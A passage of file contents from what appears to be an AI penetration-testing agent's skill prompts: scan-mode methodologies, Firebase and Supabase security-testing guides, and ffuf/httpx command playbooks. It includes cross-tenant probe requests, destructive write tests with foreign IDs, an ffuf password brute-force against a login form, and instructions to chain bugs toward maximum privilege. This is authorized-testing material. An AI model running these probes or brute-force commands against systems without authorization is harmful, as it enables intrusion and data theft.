and tools\n- Full port scanning across all services\n- Complete content discovery with multiple wordlists\n- Technology fingerprinting on all assets\n- API discovery via docs, JavaScript analysis, fuzzing\n- Identify all parameters including hidden and rarely-used ones\n- Map all user roles with different account types\n- Document rate limiting, WAF rules, security controls\n- Document complete application architecture as understood from outside\n\n## Phase 2: Business Logic Deep Dive\n\nCreate a complete storyboard of the application:\n\n- **User flows** - document every step of every workflow\n- **State machines** - map all transitions (Created β†’ Paid β†’ Shipped β†’ Delivered)\n- **Trust boundaries** - identify where privilege changes hands\n- **Invariants** - what rules should the application always enforce\n- **Implicit assumptions** - what does the code assume that might be violated\n- **Multi-step attack surfaces** - where can normal functionality be abused\n- **Third-party integrations** - map all external service dependencies\n\nUse the application extensively as every user type to understand the full data lifecycle.\n\n## Phase 3: Comprehensive Attack Surface Testing\n\nTest every input vector with every applicable technique.\n\n**Input Handling**\n- Multiple injection types: SQL, NoSQL, LDAP, XPath, command, template\n- Encoding bypasses: double encoding, unicode, null bytes\n- Boundary conditions and type confusion\n- Large payloads and buffer-related issues\n\n**Authentication & Session**\n- Exhaustive brute force protection testing\n- Session fixation, hijacking, prediction\n- JWT/token manipulation\n- OAuth flow abuse scenarios\n- Password reset vulnerabilities: token leakage, reuse, timing\n- MFA bypass techniques\n- Account enumeration through all channels\n\n**Access Control**\n- Test every endpoint for horizontal and vertical access control\n- Parameter tampering on all object references\n- Forced browsing to all discovered resources\n- HTTP method tampering (GET vs POST vs PUT vs DELETE)\n- Access control after session state changes (logout, role change)\n\n**File Operations**\n- Exhaustive file upload bypass: extension, content-type, magic bytes\n- Path traversal on all file parameters\n- SSRF through file inclusion\n- XXE through all XML parsing points\n\n**Business Logic**\n- Race conditions on all state-changing operations\n- Workflow bypass on every multi-step process\n- Price/quantity manipulation in transactions\n- Parallel execution attacks\n- TOCTOU (time-of-check to time-of-use) vulnerabilities\n\n**Advanced Techniques**\n- HTTP request smuggling (multiple proxies/servers)\n- Cache poisoning and cache deception\n- Subdomain takeover\n- Prototype pollution (JavaScript applications)\n- CORS misconfiguration exploitation\n- WebSocket security testing\n- GraphQL-specific attacks (introspection, batching, nested queries)\n\n## Phase 4: Vulnerability Chaining\n\nIndividual bugs are starting points. Chain them for maximum impact:\n\n- Combine information disclosure with access control bypass\n- Chain SSRF to reach internal services\n- Use low-severity findings to enable high-impact attacks\n- Build multi-step attack paths that automated tools miss\n- Cross component boundaries: user β†’ admin, external β†’ internal, read β†’ write, single-tenant β†’ cross-tenant\n\n**Chaining Principles**\n- Treat every finding as a pivot point: ask \"what does this unlock next?\"\n- Continue until reaching maximum privilege / maximum data exposure / maximum control\n- Prefer end-to-end exploit paths over isolated bugs: initial foothold β†’ pivot β†’ privilege gain β†’ sensitive action/data\n- Validate chains by executing the full sequence (proxy + browser for workflows, python for automation)\n- When a pivot is found, spawn focused agents to continue the chain in the next component\n\n## Phase 5: Persistent Testing\n\nWhen initial attempts fail:\n\n- Research technology-specific bypasses\n- Try alternative exploitation techniques\n- Test edge cases and unusual functionality\n- Test with different client contexts\n- Revisit areas with new information from other findings\n- Consider timing-based and blind exploitation\n- Look for logic flaws that require deep application understanding\n\n## Phase 6: Comprehensive Reporting\n\n- Document every confirmed vulnerability with full details\n- Include all severity levelsβ€”low findings may enable chains\n- Complete reproduction steps and working PoC\n- Remediation recommendations with specific guidance\n- Note areas requiring additional review beyond current scope\n\n## Agent Strategy\n\nAfter reconnaissance, decompose the application hierarchically:\n\n1. **Component level** - Auth System, Payment Gateway, User Profile, Admin Panel\n2. **Feature level** - Login Form, Registration API, Password Reset\n3. **Vulnerability level** - SQLi Agent, XSS Agent, Auth Bypass Agent\n\nSpawn specialized agents at each level. Scale horizontally to maximum parallelization:\n- Do NOT overload a single agent with multiple vulnerability types\n- Each agent focuses on one specific area or vulnerability type\n- Creates a massive parallel swarm covering every angle\n\n## Mindset\n\nRelentless. Creative. Patient. Thorough. Persistent.\n\nThis is about finding what others miss. Test every parameter, every endpoint, every edge case. If one approach fails, try ten more. Understand how components interact to find systemic issues.\n" }, { "path": "strix/skills/scan_modes/quick.md", "content": "---\nname: quick\ndescription: Time-boxed rapid assessment targeting high-impact vulnerabilities\n---\n\n# Quick Testing Mode\n\nTime-boxed assessment focused on high-impact vulnerabilities. Prioritize breadth over depth.\n\n## Approach\n\nOptimize for fast feedback on critical security issues. Skip exhaustive enumeration in favor of targeted testing on high-value attack surfaces.\n\n## Phase 1: Rapid Orientation\n\n**Whitebox (source available)**\n- Focus on recent changes: git diffs, new commits, modified filesβ€”these are most likely to contain fresh bugs\n- Identify security-sensitive patterns in changed code: auth checks, input handling, database queries, file operations\n- Trace user input through modified code paths\n- Check if security controls were modified or bypassed\n\n**Blackbox (no source)**\n- Map authentication and critical user flows\n- Identify exposed endpoints and entry points\n- Skip deep content discoveryβ€”test what's immediately accessible\n\n## Phase 2: High-Impact Targets\n\nTest in priority order:\n\n1. **Authentication bypass** - login flaws, session issues, token weaknesses\n2. **Broken access control** - IDOR, privilege escalation, missing authorization\n3. **Remote code execution** - command injection, deserialization, SSTI\n4. **SQL injection** - authentication endpoints, search, filters\n5. **SSRF** - URL parameters, webhooks, integrations\n6. **Exposed secrets** - hardcoded credentials, API keys, config files\n\nSkip for quick scans:\n- Exhaustive subdomain enumeration\n- Full directory bruteforcing\n- Low-severity information disclosure\n- Theoretical issues without working PoC\n\n## Phase 3: Validation\n\n- Confirm exploitability with minimal proof-of-concept\n- Demonstrate real impact, not theoretical risk\n- Report findings immediately as discovered\n\n## Chaining\n\nWhen a strong primitive is found (auth weakness, injection point, internal access), immediately attempt one high-impact pivot to demonstrate maximum severity. Don't stop at a low-context \"maybe\"β€”turn it into a concrete exploit sequence that reaches privileged action or sensitive data.\n\n## Operational Guidelines\n\n- Use browser tool for quick manual testing of critical flows\n- Use terminal for targeted scans with fast presets (e.g., nuclei with critical/high templates only)\n- Use proxy to inspect traffic on key endpoints\n- Skip extensive fuzzingβ€”use targeted payloads only\n- Create subagents only for parallel high-priority tasks\n\n## Mindset\n\nThink like a time-boxed bug bounty hunter going for quick wins. Prioritize breadth over depth on critical areas. If something looks exploitable, validate quickly and move on. Don't get stuckβ€”if an attack vector isn't yielding results quickly, pivot.\n" }, { "path": "strix/skills/scan_modes/standard.md", "content": "---\nname: standard\ndescription: Balanced security assessment with systematic methodology and full attack surface coverage\n---\n\n# Standard Testing Mode\n\nBalanced security assessment with structured methodology. Thorough coverage without exhaustive depth.\n\n## Approach\n\nSystematic testing across the full attack surface. Understand the application before exploiting it.\n\n## Phase 1: Reconnaissance\n\n**Whitebox (source available)**\n- Map codebase structure: modules, entry points, routing\n- Identify architecture pattern (MVC, microservices, monolith)\n- Trace input vectors: forms, APIs, file uploads, headers, cookies\n- Review authentication and authorization flows\n- Analyze database interactions and ORM usage\n- Check dependencies for known CVEs\n- Understand the data model and sensitive data locations\n\n**Blackbox (no source)**\n- Crawl application thoroughly, interact with every feature\n- Enumerate endpoints, parameters, and functionality\n- Fingerprint technology stack\n- Map user roles and access levels\n- Capture traffic with proxy to understand request/response patterns\n\n## Phase 2: Business Logic Analysis\n\nBefore testing for vulnerabilities, understand the application:\n\n- **Critical flows** - payments, registration, data access, admin functions\n- **Role boundaries** - what actions are restricted to which users\n- **Data access rules** - what data should be isolated between users\n- **State transitions** - order lifecycle, account status changes\n- **Trust boundaries** - where does privilege or sensitive data flow\n\n## Phase 3: Systematic Testing\n\nTest each attack surface methodically. Spawn focused subagents for different areas.\n\n**Input Validation**\n- Injection testing on all input fields (SQL, XSS, command, template)\n- File upload bypass attempts\n- Search and filter parameter manipulation\n- Redirect and URL parameter handling\n\n**Authentication & Session**\n- Brute force protection\n- Session token entropy and handling\n- Password reset flow analysis\n- Logout session invalidation\n- Authentication bypass techniques\n\n**Access Control**\n- Horizontal: user A accessing user B's resources\n- Vertical: unprivileged user accessing admin functions\n- API endpoints vs UI access control consistency\n- Direct object reference manipulation\n\n**Business Logic**\n- Multi-step process bypass (skip steps, reorder)\n- Race conditions on state-changing operations\n- Boundary conditions: negative values, zero, extremes\n- Transaction replay and manipulation\n\n## Phase 4: Exploitation\n\n- Every finding requires a working proof-of-concept\n- Demonstrate actual impact, not theoretical risk\n- Chain vulnerabilities to show maximum severity\n- Document full attack path from entry to impact\n- Use python tool for complex exploit development\n\n## Phase 5: Reporting\n\n- Document all confirmed vulnerabilities with reproduction steps\n- Severity based on exploitability and business impact\n- Remediation recommendations\n- Note areas requiring further investigation\n\n## Chaining\n\nAlways ask: \"If I can do X, what does that enable next?\" Keep pivoting until reaching maximum privilege or data exposure.\n\nPrefer complete end-to-end paths (entry point β†’ pivot β†’ privileged action/data) over isolated findings. Use the application as a real user wouldβ€”exploit must survive actual workflow and state transitions.\n\nWhen you discover a useful pivot (info leak, weak boundary, partial access), immediately pursue the next step rather than stopping at the first win.\n\n## Mindset\n\nMethodical and systematic. Document as you go. Validate everythingβ€”no assumptions about exploitability. Think about business impact, not just technical severity.\n" }, { "path": "strix/skills/technologies/firebase_firestore.md", "content": "---\nname: firebase-firestore\ndescription: Firebase/Firestore security testing covering security rules, Cloud Functions, and client-side trust issues\n---\n\n# Firebase / Firestore\n\nSecurity testing for Firebase applications. Focus on Firestore/Realtime Database rules, Cloud Storage exposure, callable/onRequest Functions trusting client input, and incorrect ID token validation.\n\n## Attack Surface\n\n**Data Stores**\n- Firestore (documents/collections, rules, REST/SDK)\n- Realtime Database (JSON tree, rules)\n- Cloud Storage (rules, signed URLs)\n\n**Authentication**\n- Auth ID tokens, custom claims, anonymous/sign-in providers\n- App Check attestation (and its limits)\n\n**Server-Side**\n- Cloud Functions (onCall/onRequest, triggers)\n- Admin SDK (bypasses rules)\n\n**Infrastructure**\n- Hosting rewrites, CDN/caching, CORS\n\n## Architecture\n\n**Endpoints**\n- Firestore REST: `https://firestore.googleapis.com/v1/projects//databases/(default)/documents/`\n- Realtime DB: `https://.firebaseio.com/.json`\n- Storage REST: `https://storage.googleapis.com/storage/v1/b/`\n\n**Auth**\n- Google-signed ID tokens (iss: `accounts.google.com` or `securetoken.google.com/`)\n- Audience: `` or ``, identity in `sub`/`uid`\n- Rules engines: separate for Firestore, Realtime DB, and Storage\n- Functions bypass rules when using Admin SDK\n\n## High-Value Targets\n\n- Firestore collections with sensitive data (users, orders, payments)\n- Realtime Database root and high-level nodes\n- Cloud Storage buckets with private files\n- Cloud Functions (especially triggers that grant roles or issue signed URLs)\n- Admin/staff routes and privilege-granting endpoints\n- Export/report functions that generate signed outputs\n\n## Reconnaissance\n\n**Extract Project Config**\n\nFrom client bundle:\n```javascript\n// apiKey, authDomain, projectId, appId, storageBucket, messagingSenderId\nfirebase.apps[0].options\n```\n\n**Obtain Principals**\n- Unauthenticated\n- Anonymous (if enabled)\n- Basic user A, user B\n- Staff/admin (if available)\n\nCapture ID tokens for each.\n\n## Key Vulnerabilities\n\n### Firestore Rules\n\nRules are not filtersβ€”a query must include constraints that make the rule true for all returned documents.\n\n**Common Gaps**\n- `allow read: if request.auth != null` β€” any authenticated user reads all data\n- `allow write: if request.auth != null` β€” mass write access\n- Missing per-field validation (allows adding `isAdmin`/`role`/`tenantId` fields)\n- Using client-supplied `ownerId`/`orgId` instead of `resource.data.ownerId == request.auth.uid`\n- Over-broad list rules on root collections (per-doc checks exist but list still leaks)\n\n**Secure Patterns**\n```javascript\n// Restrict write fields\nrequest.resource.data.keys().hasOnly(['field1', 'field2', 'field3'])\n\n// Enforce ownership\nresource.data.ownerId == request.auth.uid &&\nrequest.resource.data.ownerId == request.auth.uid\n\n// Org membership check\nexists(/databases/(default)/documents/orgs/$(org)/members/$(request.auth.uid))\n```\n\n**Tests**\n- Compare results for users A/B on identical queries; diff counts and IDs\n- Cross-tenant reads: `where orgId == otherOrg`; try queries without org filter\n- Write-path: set/patch with foreign `ownerId`/`orgId`; attempt to flip privilege flags\n\n### Firestore Queries\n\n- Use REST to avoid SDK client-side constraints\n- Probe composite index requirements (UI-driven queries may hide missing rule coverage)\n- Explore `collectionGroup` queries that may bypass per-collection rules\n- Use `startAt`/`endAt`/`in`/`array-contains` to probe rule edges and pagination cursors\n\n### Realtime Database\n\n- Misconfigured rules frequently expose entire JSON trees\n- Probe `https://.firebaseio.com/.json` with and without auth\n- Confirm rules use `auth.uid` and granular path checks\n- Avoid `.read/.write: true` or `auth != null` at high-level nodes\n- Attempt to write privilege-bearing nodes (roles, org membership)\n\n### Cloud Storage\n\n**Common Issues**\n- Public reads on sensitive buckets/paths\n- Signed URLs with long TTL, no content-disposition controls, replayable across tenants\n- List operations exposed: `/o?prefix=` enumerates object keys\n\n**Tests**\n- GET gs:// paths via HTTPS without auth; verify Content-Type and `Content-Disposition: attachment`\n- Generate and reuse signed URLs across accounts and paths; try case/URL-encoding variants\n- Upload HTML/SVG and verify `X-Content-Type-Options: nosniff`; check for script execution\n\n### Cloud Functions\n\n`onCall` provides `context.auth` automatically; `onRequest` must verify ID tokens explicitly. Admin SDK bypasses rulesβ€”all ownership/tenant checks must be in code.\n\n**Common Gaps**\n- Trusting client `uid`/`orgId` from request body instead of `context.auth`\n- Missing `aud`/`iss` verification when manually parsing tokens\n- Over-broad CORS allowing credentialed cross-origin requests\n- Triggers (onCreate/onWrite) granting roles based on document content controlled by client\n\n**Tests**\n- Call both onCall and onRequest endpoints with varied tokens; expect identical decisions\n- Create crafted docs to trigger privilege-granting functions\n- Attempt SSRF via Functions to project/metadata endpoints\n\n### Auth & Token Issues\n\n**Verification Requirements**\n- Issuer, audience (project), signature (Google JWKS), expiration\n- Optionally App Check binding when used\n\n**Pitfalls**\n- Accepting any JWT with valid signature but wrong audience/project\n- Trusting `uid`/account IDs from request body instead of `context.auth.uid`\n- Mixing session cookies and ID tokens without verifying both paths equivalently\n- Custom claims copied into docs then trusted by app code\n\n**Tests**\n- Replay tokens across environments/projects; expect strict `aud`/`iss` rejection\n- Call Functions with and without Authorization; verify identical checks\n\n### App Check\n\nApp Check is not a substitute for authorization.\n\n**Bypasses**\n- REST calls directly to googleapis endpoints with ID token succeed regardless of App Check\n- Mobile reverse engineering: hook client and reuse ID token flows without attestation\n\n**Tests**\n- Compare SDK vs REST behavior with/without App Check headers\n- Confirm no elevated authorization via App Check alone\n\n### Tenant Isolation\n\nApps often implement multi-tenant data models (`orgs//...`). Bind tenant from server context (membership doc or custom claim), not client payload.\n\n**Tests**\n- Vary org header/subdomain/query while keeping token fixed; verify server denies cross-tenant access\n- Export/report Functions: ensure queries execute under caller scope\n\n## Bypass Techniques\n\n- Content-type switching: JSON vs form vs multipart to hit alternate code paths in onRequest\n- Parameter/field pollution: duplicate JSON keys (last-one-wins in many parsers); sneak privilege fields\n- Caching/CDN: Hosting rewrites keying responses without Authorization or tenant headers\n- Race windows: write then read before background enforcements complete\n\n## Blind Enumeration\n\n- Firestore: use error shape, document count, ETag/length to infer existence\n- Storage: length/timing differences on signed URL attempts leak validity\n- Functions: constant-time comparisons vs variable messages reveal authorization branches\n\n## Testing Methodology\n\n1. **Extract config** - Get project config from client bundle\n2. **Obtain principals** - Collect tokens for unauth, anonymous, user A/B, admin\n3. **Build matrix** - Resource Γ— Action Γ— Principal across Firestore/Realtime/Storage/Functions\n4. **SDK vs REST** - Exercise every action via both to detect parity gaps\n5. **Seed IDs** - Start from list/query paths to gather document IDs\n6. **Cross-principal** - Swap document paths, tenants, and user IDs across principals\n\n## Tooling\n\n- SDK + REST: httpie/curl + jq for REST; Firebase emulator and Rules Playground for rapid iteration\n- Rules analysis: script probes for common patterns (`auth != null`, missing field validation)\n- Functions: fuzz onRequest with varied content-types and missing/forged Authorization\n- Storage: enumerate prefixes; test signed URL generation and reuse patterns\n\n## Validation Requirements\n\n- Owner vs non-owner Firestore queries showing unauthorized access or metadata leak\n- Cloud Storage read/write beyond intended scope (public object, signed URL reuse, list exposure)\n- Function accepting forged/foreign identity (wrong `aud`/`iss`) or trusting client `uid`/`orgId`\n- Minimal reproducible requests with roles/tokens used and observed deltas\n" }, { "path": "strix/skills/technologies/supabase.md", "content": "---\nname: supabase\ndescription: Supabase security testing covering Row Level Security, PostgREST, Edge Functions, and service key exposure\n---\n\n# Supabase\n\nSecurity testing for Supabase applications. Focus on mis-scoped Row Level Security (RLS), unsafe RPCs, leaked `service_role` keys, lax Storage policies, and Edge Functions trusting headers without binding to issuer/audience/tenant.\n\n## Attack Surface\n\n**Data Access**\n- PostgREST: table CRUD, filters, embeddings, RPC (remote functions)\n- GraphQL: pg_graphql over Postgres schema with RLS interaction\n- Realtime: replication subscriptions, broadcast/presence channels\n\n**Storage**\n- Buckets, objects, signed URLs, public/private policies\n\n**Authentication**\n- Auth (GoTrue): JWTs, cookie/session, magic links, OAuth flows\n\n**Server-Side**\n- Edge Functions (Deno): server-side code calling Supabase with secrets\n\n## Architecture\n\n**Endpoints**\n- REST: `https://.supabase.co/rest/v1/`\n- RPC: `https://.supabase.co/rest/v1/rpc/`\n- Storage: `https://.supabase.co/storage/v1`\n- GraphQL: `https://.supabase.co/graphql/v1`\n- Realtime: `wss://.supabase.co/realtime/v1`\n- Auth: `https://.supabase.co/auth/v1`\n- Functions: `https://.functions.supabase.co/`\n\n**Headers**\n- `apikey: ` β€” identifies project\n- `Authorization: Bearer ` β€” binds user context\n\n**Roles**\n- `anon`, `authenticated` β€” standard roles\n- `service_role` β€” bypasses RLS, must never be client-exposed\n\n**Key Principle**\n`auth.uid()` returns current user UUID from JWT. Policies must never trust client-supplied IDs over server context.\n\n## High-Value Targets\n\n- Tables with sensitive data (users, orders, payments, PII)\n- RPC functions (especially `SECURITY DEFINER`)\n- Storage buckets with private files\n- Edge Functions with `service_role` access\n- Export/report endpoints generating signed outputs\n- Admin/staff routes and privilege-granting endpoints\n\n## Reconnaissance\n\n**Enumerate Surfaces**\n```\n/rest/v1/
\n/rest/v1/rpc/\n/storage/v1/object/public//\n/storage/v1/object/list/?prefix=\n/graphql/v1\n/auth/v1\n```\n\n**Obtain Principals**\n- Unauthenticated (anon key only)\n- Basic user A, user B\n- Admin/staff (if available)\n- Check if `service_role` key leaked in client bundle or Edge Function responses\n\n## Key Vulnerabilities\n\n### Row Level Security (RLS)\n\nEnable RLS on every non-public table; absence or \"permit-all\" policies β†’ bulk exposure.\n\n**Common Gaps**\n- Policies check `auth.uid()` for SELECT but forget UPDATE/DELETE/INSERT\n- Missing tenant constraints (`org_id`/`tenant_id`) allow cross-tenant access\n- Policies rely on client-provided columns (`user_id` in payload) instead of JWT\n- Complex joins where policy is applied after filters, enabling inference via counts\n\n**Tests**\n```bash\n# Compare row counts for two users\nGET /rest/v1/
?select=*&Prefer=count=exact\n\n# Cross-tenant probe\nGET /rest/v1/
?org_id=eq.\nGET /rest/v1/
?or=(org_id.eq.other,org_id.is.null)\n\n# Write-path\nPATCH /rest/v1/
?id=eq.\nDELETE /rest/v1/
?id=eq.\nPOST /rest/v1/
with foreign owner_id\n```\n\n### PostgREST & REST\n\n**Filters**\n- `eq`, `neq`, `lt`, `gt`, `ilike`, `or`, `is`, `in`\n- Embed relations: `select=*,profile(*)`β€”exploits overfetch if resolvers skip per-row checks\n- Search leaks: generous `LIKE`/`ILIKE` filters combined with missing RLS β†’ mass disclosure via wildcard queries\n\n**Headers**\n- `Prefer: return=representation` β€” echo writes\n- `Prefer: count=exact` β€” exposure via counts\n- `Accept-Profile`/`Content-Profile` β€” select schema\n\n**IDOR Patterns**\n```\n/rest/v1/
?select=*&id=eq.\n/rest/v1/
?select=*&slug=eq.\n/rest/v1/
?select=*&email=eq.\n```\n\n**Mass Assignment**\n- If RPC not used, PATCH can update unintended columns\n- Verify restricted columns via database permissions/policies\n\n### RPC Functions\n\nRPC endpoints map to SQL functions. `SECURITY DEFINER` bypasses RLS unless carefully coded; `SECURITY INVOKER` respects caller.\n\n**Anti-Patterns**\n- `SECURITY DEFINER` + missing owner checks β†’ vertical/horizontal bypass\n- `set search_path` left to public; function resolves unsafe objects\n- Trusting client-supplied `user_id`/`tenant_id` rather than `auth.uid()`\n\n**Tests**\n```bash\n# Call as different users with foreign IDs\nPOST /rest/v1/rpc/ {\"user_id\": \"\"}\n\n# Remove JWT entirely\nAuthorization: Bearer \n```\nVerify functions perform explicit ownership/tenant checks inside SQL.\n\n### Storage\n\n**Buckets**\n- Public vs private; objects in `storage.objects` with RLS-like policies\n\n**Misconfigurations**\n```bash\n# Public bucket with sensitive data\nGET /storage/v1/object/public//\n\n# List prefixes without auth\nGET /storage/v1/object/list/?prefix=\n\n# Signed URL reuse across tenants/paths\n```\n\n**Content-Type Abuse**\n- Upload HTML/SVG served as `text/html` or `image/svg+xml`\n- Verify `X-Content-Type-Options: nosniff` and `Content-Disposition: attachment`\n\n**Path Confusion**\n- Mixed case, URL-encoding, `..` segments may be rejected at UI but accepted by API\n- Test path normalization differences between client validation and server handling\n\n### Realtime\n\n**Endpoint**: `wss://.supabase.co/realtime/v1`\n\n**Risks**\n- Channel names derived from table/schema/filters leaking other users' updates when RLS or channel guards are weak\n- Broadcast/presence channels allowing cross-room join/publish without auth\n\n**Tests**\n- Subscribe to `public:realtime` changes on protected tables; confirm visibility aligns with RLS\n- Attempt joining other users' channels: `room:`, `org:`\n\n### GraphQL\n\n**Endpoint**: `/graphql/v1` using pg_graphql with RLS\n\n**Risks**\n- Introspection reveals schema relations\n- Overfetch via nested relations where resolvers skip per-row ownership checks\n- Global node IDs leaked and reusable via different viewers\n\n**Tests**\n- Compare REST vs GraphQL responses for same principal and query shape\n- Query deep nested fields; verify RLS holds at each edge\n\n### Auth & Tokens\n\nGoTrue issues JWTs with claims (`sub=uid`, `role`, `aud=authenticated`).\n\n**Verification Requirements**\n- Issuer, audience, expiration, signature, tenant context\n\n**Pitfalls**\n- Storing tokens in localStorage β†’ XSS exfiltration\n- Treating `apikey` as identity (it's project-scoped, not user identity)\n- Exposing `service_role` key in client bundle or Edge Function responses\n- Refresh token mismanagement leading to long-lived sessions beyond intended TTL\n\n**Tests**\n- Replay tokens across services; check audience/issuer pinning\n- Try downgraded tokens (expired/other audience) against custom endpoints\n\n### Edge Functions\n\nDeno-based functions often initialize Supabase client with `service_role`.\n\n**Risks**\n- Trusting Authorization/apikey headers without verifying JWT against issuer/audience\n- CORS: wildcard origins with credentials; reflected Authorization in responses\n- SSRF via fetch; secrets exposed via error traces or logs\n\n**Tests**\n- Call functions with and without Authorization; compare behavior\n- Try foreign resource IDs in payloads; verify server re-derives user/tenant from JWT\n- Attempt to reach internal endpoints (metadata services) via function fetch\n\n### Tenant Isolation\n\nEnsure every query joins or filters by `tenant_id`/`org_id` derived from JWT context, not client input.\n\n**Tests**\n- Change subdomain/header/path tenant selectors while keeping JWT tenant constant\n- Export/report endpoints: confirm queries execute under caller scope\n\n## Bypass Techniques\n\n- Content-type switching: `application/json` ↔ `application/x-www-form-urlencoded` ↔ `multipart/form-data`\n- Parameter pollution: duplicate keys in JSON/query (PostgREST chooses last/first depending on parser)\n- GraphQL+REST parity probing: protections often drift; fetch via the weaker path\n- Race windows: parallel writes to bypass post-insert ownership updates\n\n## Blind Enumeration\n\n- Use `Prefer: count=exact` and ETag/length diffs to infer unauthorized rows\n- Conditional requests (`If-None-Match`) to detect object existence\n- Storage signed URLs: timing/length deltas to map valid vs invalid tokens\n\n## Testing Methodology\n\n1. **Inventory surfaces** - Map REST, Storage, GraphQL, Realtime, Auth, Functions endpoints\n2. **Obtain principals** - Collect tokens for anon, user A/B, admin; check for `service_role` leaks\n3. **Build matrix** - Resource Γ— Action Γ— Principal\n4. **REST vs GraphQL** - Test both to find parity gaps\n5. **Seed IDs** - Start with list/search endpoints to gather IDs\n6. **Cross-principal** - Swap IDs, tenants, and transports across principals\n\n## Tooling\n\n- PostgREST: httpie/curl + jq; enumerate tables; fuzz filters (`or=`, `ilike`, `neq`, `is.null`)\n- GraphQL: graphql-inspector, voyager; deep queries for field-level enforcement\n- Realtime: custom ws client; subscribe to suspicious channels; diff payloads per principal\n- Storage: enumerate bucket listing APIs; script signed URL patterns\n- Auth/JWT: jwt-cli/jose to validate audience/issuer; replay against Edge Functions\n- Policy diffing: maintain request sets per role; compare results across releases\n\n## Validation Requirements\n\n- Owner vs non-owner requests for REST/GraphQL showing unauthorized access (content or metadata)\n- Mis-scoped RPC or Storage signed URL usable by another user/tenant\n- Realtime or GraphQL exposure matching missing policy checks\n- Minimal reproducible requests with role contexts documented\n" }, { "path": "strix/skills/tooling/ffuf.md", "content": "---\nname: ffuf\ndescription: ffuf fuzzing syntax with matcher/filter strategy and non-interactive defaults.\n---\n\n# ffuf CLI Playbook\n\nOfficial docs:\n- https://github.com/ffuf/ffuf\n\nCanonical syntax:\n`ffuf -w -u [flags]`\n\nHigh-signal flags:\n- `-u ` target URL containing `FUZZ`\n- `-w ` wordlist input (supports `KEYWORD` mapping via `-w file:KEYWORD`)\n- `-mc ` match status codes\n- `-fc ` filter status codes\n- `-fs ` filter by body size\n- `-ac` auto-calibration\n- `-t ` threads\n- `-rate ` request rate\n- `-timeout ` HTTP timeout\n- `-x ` upstream proxy (HTTP/SOCKS)\n- `-ignore-body` skip downloading response body\n- `-noninteractive` disable interactive console mode\n- `-recursion` and `-recursion-depth ` recursive discovery\n- `-H
` custom headers\n- `-X ` and `-d ` for non-GET fuzzing\n- `-o -of ` structured output\n\nAgent-safe baseline for automation:\n`ffuf -w wordlist.txt -u https://target.tld/FUZZ -mc 200,204,301,302,307,401,403,405 -ac -t 20 -rate 50 -timeout 10 -noninteractive -of json -o ffuf.json`\n\nCommon patterns:\n- Basic path fuzzing:\n `ffuf -w /path/wordlist.txt -u https://target.tld/FUZZ -mc 200,204,301,302,307,401,403 -ac -t 40 -rate 200 -noninteractive`\n- Vhost fuzzing:\n `ffuf -w vhosts.txt -u https://target.tld -H 'Host: FUZZ.target.tld' -fs 0 -ac -noninteractive`\n- Parameter value fuzzing:\n `ffuf -w values.txt -u 'https://target.tld/search?q=FUZZ' -mc all -fs 0 -ac -t 30 -noninteractive`\n- POST body fuzzing:\n `ffuf -w payloads.txt -u https://target.tld/login -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=admin&password=FUZZ' -fc 401 -noninteractive`\n- Recursive discovery:\n `ffuf -w dirs.txt -u https://target.tld/FUZZ -recursion -recursion-depth 2 -ac -t 30 -noninteractive`\n- Proxy-instrumented run:\n `ffuf -w wordlist.txt -u https://target.tld/FUZZ -x http://127.0.0.1:48080 -mc 200,301,302,403 -ac -noninteractive`\n\nCritical correctness rules:\n- `FUZZ` must appear exactly at the mutation point in URL/header/body.\n- If using `-w file:KEYWORD`, that same `KEYWORD` must be present in URL/header/body.\n- Always include `-noninteractive` in agent/script execution to prevent ffuf console mode from swallowing subsequent shell commands.\n- Save structured output with `-of json -o ` for deterministic parsing.\n\nUsage rules:\n- Prefer explicit matcher/filter strategy (`-mc`/`-fc`/`-fs`) over default-only output.\n- Start conservative (`-rate`, `-t`) and scale only if target tolerance is known.\n- Do not use `-h`/`--help` during normal execution unless absolutely necessary.\n\nFailure recovery:\n- If ffuf drops into interactive mode, send `C-c` and rerun with `-noninteractive`.\n- If response noise is too high, tighten `-mc/-fc/-fs` instead of increasing load.\n- If runtime is too long, lower `-rate/-t` and tighten scope.\n\nIf uncertain, query web_search with:\n`site:github.com/ffuf/ffuf README`\n" }, { "path": "strix/skills/tooling/httpx.md", "content": "---\nname: httpx\ndescription: ProjectDiscovery httpx probing syntax, exact probe flags, and automation-safe output patterns.\n---\n\n# httpx CLI Playbook\n\nOfficial docs:\n- https://docs.projectdiscovery.io/opensource/httpx/usage\n- https://docs.projectdiscovery.io/opensource/httpx/running\n- https://github.com/projectdiscovery/httpx\n\nCanonical syntax:\n`httpx [flags]`\n\nHigh-signal flags:\n- `-u, -target ` single target\n- `-l, -list ` target list\n- `-nf, -no-fallback` probe both HTTP and HTTPS\n- `-nfs, -no-fallback-scheme` do not auto-switch schemes\n- `-sc` status code\n- `-title` page title\n- `-server, -web-server` server header\n- `-td, -tech-detect` technology detection\n- `-fr, -follow-redirects` follow redirects\n- `-mc ` / `-fc ` match or filter status codes\n- `-path ` probe specific paths\n- `-p, -ports ` probe custom ports\n- `-proxy, -http-proxy ` proxy target requests\n- `-tlsi, -tls-impersonate` experimental TLS impersonation\n- `-j, -json` JSONL output\n- `-sr, -store-response` store request/response artifacts\n- `-srd, -store-response-dir ` custom directory for stored artifacts\n- `-silent` compact output\n- `-rl ` requests/second cap\n- `-t ` threads\n- `-timeout ` request timeout\n- `-retries ` retry attempts\n- `-o ` output file\n\nAgent-safe baseline for automation:\n`httpx -l hosts.txt -sc -title -server -td -fr -timeout 10 -retries 1 -rl 50 -t 25 -silent -j -o httpx.jsonl`\n\nCommon patterns:\n- Quick live+fingerprint check:\n `httpx -l hosts.txt -sc -title -server -td -silent -o httpx.txt`\n- Probe known admin paths:\n `httpx -l hosts.txt -path /,/login,/admin -sc -title -silent -j -o httpx_paths.jsonl`\n- Probe both schemes explicitly:\n `httpx -l hosts.txt -nf -sc -title -silent`\n- Vhost detection pass:\n `httpx -l hosts.txt -vhost -sc -title -silent -j -o httpx_vhost.jsonl`\n- Proxy-instrumented probing:\n `httpx -l hosts.txt -sc -title -proxy http://127.0.0.1:48080 -silent -j -o httpx_proxy.jsonl`\n- Response-storage pass for downstream content parsing:\n `httpx -l hosts.txt -fr -sr -srd recon/httpx_store -sc -title -server -cl -ct -location -probe -silent`\n\nCritical correctness rules:\n- For machine parsing, prefer `-j -o `.\n- Keep `-rl` and `-t` explicit for reproducible throughput.\n- Use `-nf` when you need dual-scheme probing from host-only input.\n- When using `-path` or `-ports`, keep scope tight to avoid accidental scan inflation.\n- Use `-sr -srd ` when later steps need raw response artifacts (JS/route extraction, grepping, 